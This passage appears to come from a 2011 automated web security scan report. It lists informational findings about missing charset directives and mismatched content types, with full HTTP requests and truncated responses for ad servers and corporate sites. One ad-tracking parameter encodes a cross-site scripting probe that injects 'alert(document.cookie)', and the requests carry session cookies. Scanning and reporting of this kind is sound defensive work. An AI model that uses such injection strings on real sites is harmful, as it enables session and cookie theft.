In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


22.1. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.Media6/B3897970.8

Request

GET /adi/N1558.Media6/B3897970.8;sz=728x90;click0=http://ad.media6degrees.com/adserv/clk?tId=12497909247337382|cId=3211|cb=1297710111|notifyPort=8080|exId=20|tId=12497909247337382|ec=1|secId=57|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|advId=971|notifyServer=asd146.sd.pl.pvt|spId=27355|adType=iframe|invId=135|bid=1.61|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D;ord=1297710112102? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=12497909247337382|cb=1297710111|adType=iframe|cId=3211|ec=1|spId=27355|advId=971|exId=20|price=TVl8HgAMoucK5Wgls29b3PX_MoiUTYw1PBJRMA|pubId=56|secId=57|invId=135|notifyServer=asd146.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=|ctrack=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB9leAHnxZTefFMqXQlQfct72bC_-unYMCx9fN2ief_6ONYAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xODk0NTc4OTUwNTMyNTA0oAGLgMjrA7IBGXd3dy5zZWN1cml0eW5ld3NkYWlseS5jb226AQk3Mjh4OTBfYXPIAQnaAVFodHRwOi8vd3d3LnNlY3VyaXR5bmV3c2RhaWx5LmNvbS90b29sczM0N2FjJy1hbGVydChkb2N1bWVudC5jb29raWUpLSc5ZjlhMmUzNjk3NC-YAp4KwAIFyALR0c8MqAMB6AOdCegD4gXoA7sC6AO6AvUDAAAAxPUDEAAAAA%26num%3D1%26sig%3DAGiWqtzWDWiQGS9YdY2V3Kkt29cplZ3pbA%26client%3Dca-pub-1894578950532504%26adurl%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8681
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 19:01:52 GMT
Expires: Mon, 14 Feb 2011 19:01:52 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

22.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2100686&PluID=0&w=300&h=250&ord=5918453&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/o%3B234618958%3B0-0%3B0%3B53309666%3B4307-300/250%3B40072924/40090711/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/index.php?option=com_ads&format=raw&w=300&ad=99&ord=454835708718746900&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=0f1dd3d09f7885410d7cea8cd0fbff710419c103
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=0; A3=gSboahoy0aSU00002gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdw07ZZ00001fFb9afAF02WG00001h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeahAp0c9M00003gYx+adw90cvM00001gKXNaepP0bdR00001afPqahnP09NH00001heXfagzX0c9M00001heXgahod0c9M00003h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhahnM0c9M00004heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjahoy0c9M00002hbwIaeVY09SF00002heXaaf9P0c9M00001gSdpafvK0aSU00001hAp8ahzF06OS00001heXbahoZ0c9M00001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=5p9W0000000001td8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t58fq70000000001t88qav000000000atd7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t68oiy0000000001te7FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fpT0000000002td8fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000007te8i430000000001t2852A0000000001sS8qay0000000002td87H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=0; expires=Sun, 15-May-2011 13:57:17 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gPVtafzY0bnA00001gSdsafy50aSU00003gSboahoy0aSU00002gLnTaeKR09sO00001h5j3afvK07l00000.h5iUafy507l00000SfFb9afAF02WG00001gDQzahdw07ZZ00001gYyfadw90cvM00001gDa8aeXd0aA900001gYRSaeKR09sO00001gL2MadKj0bdR00001hghLaeVW09SF00002g7VJafdh08.I00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001heXeahAp0c9M00003heXfagzX0c9M00001afPqahnP09NH00001gHrHaeKS09sO00001gSdkafvD0aSU00001h6moagvf0aMN00002heXgahod0c9M00003heXhahnM0c9M00004gK8raeXe0aA900001gSdmafy60aSU00002heXiagzX0c9M00004heXjahoy0c9M00002gSdnafwN0aSU00003hbwIaeVY09SF00002hAp8ahzF06OS00001gSdpafvK0aSU00001heXaaf9P0c9M00001hbxBahE507aw00001heXbahoZ0c9M00001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000St88qiu0000000002t68bvZ0000000001t65p9W0000000001td89PT000000000.t87oaf0000000001t884fB0000000001t88fq40000000001t88fq50000000003t88bwx0000000001t48i440000000001t28mb20000000001t480Te0000000001te82790000000002t57PrH0000000001t78fq70000000001t886Bm0000000001t67dNH0000000002sZ8qav000000000atd8oiy0000000001te8j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV8nAl0000000002t682980000000001t384U10000000001t6852N0000000001s.8fq20000000003t88fpT0000000002td8fq30000000002t86o.Q0000000001sY87ma0000000001s.8i430000000001t28qaw0000000007te8qay0000000002td8n7e0000000002tb87H10000000001td; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 14 Feb 2011 18:57:17 GMT
Connection: close
Content-Length: 1872

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

22.3. http://www.b2i.us/blank.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /blank.htm

Request

GET /blank.htm HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.mygovernancewebsite.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 142
Content-Type: text/html
Last-Modified: Tue, 13 Apr 2004 13:26:29 GMT
Accept-Ranges: none
ETag: "607afded5a21c41:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:10 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Untitled</title>
</head>
<body>
</body>
</html>

22.4. http://www.b2i.us/profiles/investor/contactus.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/investor/contactus.asp

Request

GET /profiles/investor/contactus.asp?f=1&BzID=1475&to=cm&Nav=0&LangID=1&s=0 HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.mygovernancewebsite.com/requestinfo.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; server=66%2E111%2E109%2E155; cNav1475=0; cSite1475=0; cLang1475=1; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
pragma: no-cache
cache-control: private
Content-Length: 12228
Content-Type: text/html
Expires: Mon, 14 Feb 2011 18:41:30 GMT
Set-Cookie: server=66%2E111%2E109%2E155; path=/
Cache-control: no-cache
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>

<title>Request Information</title>

<META name="ROBOTS" content="NOFOLLOW">
</head>
<body bgcolor="#FFFFFF" l
...[SNIP]...

22.5. http://www.b2i.us/profiles/investor/fullpage.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/investor/fullpage.asp

Request

GET /profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606 HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.mygovernancewebsite.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cSite1475=0; cNav1475=0; cLang1475=1; ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
pragma: no-cache
cache-control: private
Content-Length: 11561
Content-Type: text/html
Expires: Mon, 14 Feb 2011 18:41:12 GMT
Set-Cookie: server=66%2E111%2E109%2E155; path=/
Cache-control: no-cache
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META NAME="keywords" content="Corporate Governance, corporate governance web sites, investor relations web sites, in
...[SNIP]...

22.6. http://www.bericotechnologies.com/opportunities/dc-metro  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bericotechnologies.com
Path:   /opportunities/dc-metro

Request

GET /opportunities/dc-metro HTTP/1.1
Host: www.bericotechnologies.com
Proxy-Connection: keep-alive
Referer: http://www.bericotechnologies.com/berico-projects/coral-reef
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS3c4036a5947dcf60c7c1c31f914be361=9f5cadef4aa0a266b0ff7d08a7f3814d; __utmz=177377846.1297709462.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=177377846.1924676899.1297709462.1297709462.1297709462.1; __utmc=177377846; __utmb=177377846.2.10.1297709462; __utma_a2a=7724940235.1329266428.1297709502.1297709502.1297709502.1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 14 Feb 2011 18:52:48 GMT
Content-Type: text/html
Content-Length: 176

<br />
<b>Fatal error</b>: Out of memory (allocated 2621440) (tried to allocate 19456 bytes) in <b>/home/berico01/public_html/includes/theme.inc</b> on line <b>1540</b><br />

22.7. http://www.bericotechnologies.com/sites/all/themes/berico/images/news_bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bericotechnologies.com
Path:   /sites/all/themes/berico/images/news_bg.png

Request

GET /sites/all/themes/berico/images/news_bg.png HTTP/1.1
Host: www.bericotechnologies.com
Proxy-Connection: keep-alive
Referer: http://www.bericotechnologies.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS3c4036a5947dcf60c7c1c31f914be361=9f5cadef4aa0a266b0ff7d08a7f3814d; has_js=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 14 Feb 2011 18:52:46 GMT
Content-Type: text/html
Content-Length: 177

<br />
<b>Fatal error</b>: Out of memory (allocated 2097152) (tried to allocate 19456 bytes) in <b>/home/berico01/public_html/includes/common.inc</b> on line <b>1457</b><br />

22.8. http://www.mygovernancewebsite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mygovernancewebsite.com
Path:   /

Request

GET / HTTP/1.1
Host: www.mygovernancewebsite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 835
Content-Type: text/html
Content-Location: http://www.mygovernancewebsite.com/default.htm
Last-Modified: Thu, 18 Jan 2007 22:54:16 GMT
Accept-Ranges: bytes
ETag: "cb885294533bc71:6c4cc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 18:42:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
</title>
<meta http-equiv="content-type" content="text/html" />
</head>
...[SNIP]...

22.9. http://www.mygovernancewebsite.com/requestinfo.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mygovernancewebsite.com
Path:   /requestinfo.htm

Request

GET /requestinfo.htm HTTP/1.1
Host: www.mygovernancewebsite.com
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 722
Content-Type: text/html
Last-Modified: Wed, 04 Apr 2007 18:50:38 GMT
Accept-Ranges: bytes
ETag: "99713b23ea76c71:6c4cc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 18:42:29 GMT

<!doctype html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Inv
...[SNIP]...
</title>
<meta http-equiv="content-type" content="text/html" />
</head>
...[SNIP]...

22.10. http://www.webcastir.com/SlideShowView.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcastir.com
Path:   /SlideShowView.asp

Request

GET /SlideShowView.asp?B=1475&S=MyGovernanceWebsite_2006_12_08 HTTP/1.1
Host: www.webcastir.com
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 14 Feb 2011 18:42:19 GMT
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 14 Feb 2011 18:41:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCARTCQDA=IDPPADGAMEICOJEGLGGGNGCJ; path=/
Vary: Accept-Encoding
Set-Cookie: Coyote-2-426f6d68=426f6d2c:0; path=/
Content-Length: 2597


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Slide 1</title>
<META name="ROBOTS" content="NOINDEX,NOFOLLOW">
<META HTTP-EQUIV="imagetoolbar" CONTENT="n
...[SNIP]...

22.11. http://www.webcastir.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcastir.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.webcastir.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSBSCC=LLELFGGAOFEAHPKMENBGOGAB; Coyote-2-426f6d68=426f6d2d:0

Response

HTTP/1.1 404 Not Found
Content-Length: 14027
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 18:42:19 GMT
Set-Cookie: Coyote-2-426f6d68=426f6d2d:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META HTTP-EQUIV=refresh CONTENT=3550; URL=http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=318&to=cp&Nav=0&La
...[SNIP]...

23. Content type incorrectly stated  previous
There are 8 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


23.1. http://api.toptenreviews.com/r/c/request.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.toptenreviews.com
Path:   /r/c/request.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /r/c/request.php?path=tmn/security&sub_id=testsubid HTTP/1.1
Host: api.toptenreviews.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:14 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 9930


var country_code = 'US';
var encoded_page_url = encodeURIComponent(document.location);
var encoded_sub_id = 'testsubid';var encoded_tag_path = 'tmn%2Fsecurity';var app_url = 'http://api.toptenreviews
...[SNIP]...

23.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2100686&PluID=0&w=300&h=250&ord=5918453&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/o%3B234618958%3B0-0%3B0%3B53309666%3B4307-300/250%3B40072924/40090711/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/index.php?option=com_ads&format=raw&w=300&ad=99&ord=454835708718746900&zone=home_page&kw=internet%20security%20news%2Chome%20security%2Ccybercrimes%2Cnetwork%20threats%2Cidentity%20theft%2Cinternet%20scams%2Ccomputer%20virus%20removal%2Csocial%20networks&sz=&token=0f1dd3d09f7885410d7cea8cd0fbff710419c103
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=0; A3=gSboahoy0aSU00002gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdw07ZZ00001fFb9afAF02WG00001h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeahAp0c9M00003gYx+adw90cvM00001gKXNaepP0bdR00001afPqahnP09NH00001heXfagzX0c9M00001heXgahod0c9M00003h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhahnM0c9M00004heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjahoy0c9M00002hbwIaeVY09SF00002heXaaf9P0c9M00001gSdpafvK0aSU00001hAp8ahzF06OS00001heXbahoZ0c9M00001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=5p9W0000000001td8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t58fq70000000001t88qav000000000atd7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t68oiy0000000001te7FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fpT0000000002td8fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000007te8i430000000001t2852A0000000001sS8qay0000000002td87H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=0; expires=Sun, 15-May-2011 13:57:17 GMT; domain=bs.serving-sys.com; path=/
